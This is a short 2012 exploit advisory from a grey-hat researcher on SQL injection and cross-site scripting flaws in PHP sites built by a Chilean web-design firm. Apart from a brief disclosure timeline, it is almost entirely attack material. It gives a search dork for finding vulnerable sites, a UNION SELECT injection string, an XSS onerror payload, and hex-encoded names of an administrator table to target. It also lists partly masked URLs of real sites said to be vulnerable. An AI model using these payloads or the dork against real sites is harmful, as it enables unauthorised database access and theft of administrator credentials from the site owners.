-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_@live.com # Line: GreyHat # Exploit Title: Dise&#241;o Internet Chile - SQL Injection / Cross-Site Scripting Vulnerabilities # Dork: intext:Dise&#241;o www.dise&#241;ointernet.cl # Date: 13/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.dise&#241;ointernet.cl/ # Vendor Name: Dise&#241;o Internet Chile # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [05/11/2012] - Vulnerability discovered [08/11/2012] - Vendor notified Dont responsed [13/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/detalle_noticia.php?&id= < Sql Vulnerability Path > http://site.com/detalle_noticia.php?&id= < Xss Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12,14,15,16,17,18,19,20,21,22,23,24,25,26-- # Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");> # Payload/Comand/Sql=> table_schema=0x706172726F7175695F61646D696E / table_name=0x74626C5F61646D696E6973747261646F72 # Demo_Xss_Sql_Vulnerabilities http://www.textXXXchile.cl/detalle_noticia.php?id=1' http://parroquiXXXsusnazareno.info/detalle_noticia.php?id=1' http://aprXXXd.cl/detalle_noticia.php?id=1' http://www.apXXjud.cl/detalle_noticia.php?&id=1'